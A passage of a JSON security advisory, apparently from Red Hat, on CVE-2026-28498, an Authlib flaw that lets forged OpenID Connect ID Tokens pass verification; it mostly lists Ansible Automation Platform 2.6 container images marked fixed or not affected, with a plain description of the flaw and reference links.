"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448182"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library\u0027s internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Authentication bypass via forged OpenID Connect ID Tokens",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This IMPORTANT vulnerability in Authlib allows attackers to bypass OIDC ID Token integrity verification. The at_hash and c_hash validation fails open for unknown algorithms, accepting forged tokens as valid. Exploitation requires no authentication or user interaction. Impact is high to confidentiality and integrity. Red Hat products using Authlib for OIDC validation are affected. Fixed in version 1.6.9.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28498"
},
{
"category": "external",
"summary": "RHBZ#2448182",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448182"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28498",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28498"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498",
